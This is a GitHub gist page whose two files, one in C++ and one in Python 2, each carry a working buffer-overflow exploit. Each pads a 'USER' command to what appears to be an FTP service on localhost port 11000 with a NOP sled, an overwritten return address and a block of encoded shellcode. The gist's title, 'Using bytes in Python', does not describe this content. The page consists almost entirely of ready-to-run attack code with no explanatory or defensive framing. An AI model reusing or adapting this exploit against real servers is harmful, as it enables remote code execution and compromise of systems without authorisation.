Created
October 30, 2012 00:07
-
-
Save Jeswang/3977494 to your computer and use it in GitHub Desktop.
Using bytes in Python.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <string.h> | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #include <netinet/in.h> | |
| #include <netdb.h> | |
| #include <iostream> | |
| #include <string> | |
| using namespace std; | |
| void error(const char *msg) | |
| { | |
| perror(msg); | |
| exit(0); | |
| } | |
| char port[] = "11000"; | |
| char address[] = "localhost"; | |
| unsigned char shellcode_cstr[] = | |
| "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" | |
| "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a" | |
| "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32" | |
| "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b" | |
| "\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e" | |
| "\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56" | |
| "\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65" | |
| "\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f" | |
| "\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b" | |
| "\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68" | |
| "\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64" | |
| "\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35" | |
| "\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a" | |
| "\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f" | |
| "\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55" | |
| "\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b" | |
| "\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41" | |
| "\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b" | |
| "\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70" | |
| "\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42" | |
| "\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64" | |
| "\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71" | |
| "\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41" | |
| "\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42" | |
| "\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71" | |
| "\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54" | |
| "\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61" | |
| "\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42" | |
| "\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65" | |
| "\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a"; | |
| unsigned char nop = '\x90'; | |
| int main(int argc, char *argv[]) | |
| { | |
| int sockfd, portno, n; | |
| struct sockaddr_in serv_addr; | |
| struct hostent *server; | |
| string fill(485, nop); | |
| string fill2(20, nop); | |
| string eip_address("\x12\x45\xfa\x7f"); | |
| string shellcode = ""; | |
| shellcode += (char*)shellcode_cstr; | |
| string user_line = "USER "+fill+eip_address+fill2+shellcode+"\n"; | |
| string pass_line("PASS 123\n"); | |
| char buffer[2000]; | |
| portno = atoi(port); | |
| sockfd = socket(AF_INET, SOCK_STREAM, 0); | |
| if (sockfd < 0) | |
| error("ERROR opening socket"); | |
| server = gethostbyname(address); | |
| if (server == NULL) { | |
| fprintf(stderr,"ERROR, no such host\n"); | |
| exit(0); | |
| } | |
| bzero((char *) &serv_addr, sizeof(serv_addr)); | |
| serv_addr.sin_family = AF_INET; | |
| bcopy((char *)server->h_addr, | |
| (char *)&serv_addr.sin_addr.s_addr, | |
| server->h_length); | |
| serv_addr.sin_port = htons(portno); | |
| if (connect(sockfd,(struct sockaddr *) &serv_addr,sizeof(serv_addr)) < 0) | |
| error("ERROR connecting"); | |
| strcpy( buffer, user_line.c_str()); | |
| n = write(sockfd,buffer,strlen(buffer)); | |
| if (n < 0) | |
| error("ERROR writing to socket"); | |
| strcpy( buffer, pass_line.c_str()); | |
| n = write(sockfd,buffer,strlen(buffer)); | |
| if (n < 0) | |
| error("ERROR writing to socket"); | |
| close(sockfd); | |
| return 0; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding:utf-8 -*- | |
| import struct | |
| import telnetlib | |
| #填充数据 | |
| fill = '\x90' * 485 | |
| eip_address = '\x12\x45\xfa\x7f' | |
| fill2 = '\x90' * 20 | |
| shellcode = ( | |
| "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" | |
| "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a" | |
| "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32" | |
| "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b" | |
| "\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e" | |
| "\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56" | |
| "\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65" | |
| "\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f" | |
| "\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b" | |
| "\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68" | |
| "\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64" | |
| "\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35" | |
| "\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a" | |
| "\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f" | |
| "\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55" | |
| "\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b" | |
| "\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41" | |
| "\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b" | |
| "\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70" | |
| "\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42" | |
| "\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64" | |
| "\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71" | |
| "\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41" | |
| "\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42" | |
| "\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71" | |
| "\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54" | |
| "\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61" | |
| "\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42" | |
| "\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65" | |
| "\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a" | |
| ) | |
| tn = telnetlib.Telnet('127.0.0.1', 11000) | |
| user_string = "USER " + fill + eip_address + fill2 + shellcode + '\r\n' | |
| tn.write(user_string) | |
| pass_string = "PASS 123\r\n" | |
| tn.write(pass_string) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment